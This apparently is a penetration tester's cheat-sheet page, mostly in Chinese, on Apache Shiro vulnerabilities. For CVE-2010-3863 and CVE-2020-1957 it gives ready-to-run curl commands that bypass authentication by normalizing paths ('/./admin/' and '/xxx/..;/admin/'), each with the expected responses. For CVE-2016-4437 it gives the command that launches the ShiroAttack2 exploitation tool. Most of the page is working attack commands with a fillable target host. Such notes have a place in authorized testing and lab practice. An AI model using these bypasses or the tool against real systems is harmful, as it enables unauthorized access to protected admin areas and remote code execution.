Shiro Component Assessment
CVE-2010-3863
1.1.0 之前的 Apache Shiro 和 JSecurity 0.9.x 在将 URI 路径与 shiro.ini 文件中的条目进行比较之前不会对其进行规范化,这允许远程攻击者通过精心设计的请求绕过预期的访问限制,如 /./
、 /../
、 /
、 //
URI。
HOST=; PORT=8080; # TARGET HOST INFO
curl http://$HOST:$PORT/admin/ -I
# HTTP/1.1 302
curl http://$HOST:$PORT/./admin/ -I
# HTTP/1.1 200
CVE-2016-4437
需要配置 JDK 1.8
cd ~/hack/tools/shiro/ShiroAttack2
java -jar shiro_attack-4.7.0-SNAPSHOT-all.jar
# REFERENCE DOCS
https://github.com/SummerSec/ShiroAttack2
https://vulhub.org/#/environments/shiro/CVE-2016-4437
CVE-2020-1957
在带有 Spring 动态控制器的 Apache Shiro 1.5.2 之前的版本中,攻击者可以使用 ..;
构造恶意制作的请求来绕过目录身份验证。
HOST=; PORT=8080; # TARGET HOST INFO
curl http://$HOST:$PORT/admin/ -I
# HTTP/1.1 302
curl http://$HOST:$PORT/xxx/..;/admin/ -I
# HTTP/1.1 200
# REFERENCE DOCS
https://github.com/vulhub/vulhub/blob/master/shiro/CVE-2020-1957/README.zh-cn.md
最后更新于